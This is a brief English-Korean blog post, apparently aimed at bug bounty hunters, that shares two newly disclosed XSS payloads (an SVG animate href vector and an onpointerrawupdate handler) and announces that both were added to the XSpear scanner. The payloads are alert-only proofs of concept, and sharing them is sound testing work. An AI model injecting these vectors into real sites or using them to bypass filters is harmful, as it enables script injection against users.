Hi hackers and bugbounty hunter! Recently, two previously unknown XSS Payloads were disclosure one after another. It’s not a payload that’s very difficult to understand, so I’ll share it briefly! 최근 기존에 알려지지 않은 XSS Payload 2개가 연달아 공개됬습니다. 이해에 큰 어려움이 있는 페이로드는 아니니, 간략하게만 내용 공유할게요!
SVG Aniamte XSS
<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?;javascript:alert(45);0" /><a id=xss><text x=20 y=20>XSS</text></a>
onpointerrawupdate event handler for XSS
<div onpointerrawupdate=alert(45)>xss</div>
Updated XSpear (1.3.3)
I added this two payload in xspear. Please use it after the update. 2일전인가.. XSpear에는 반영해뒀습니다.
https://github.com/hahwul/XSpear/issues/49 https://github.com/hahwul/XSpear/issues/50
1.3.3으로 업데이트 후 사용하시면 기본적으로 포함됩니다 : )
gem update XSpear
Reference
https://twitter.com/XssPayloads/status/1225426346366701568 https://portswigger.net/research/svg-animate-xss-vector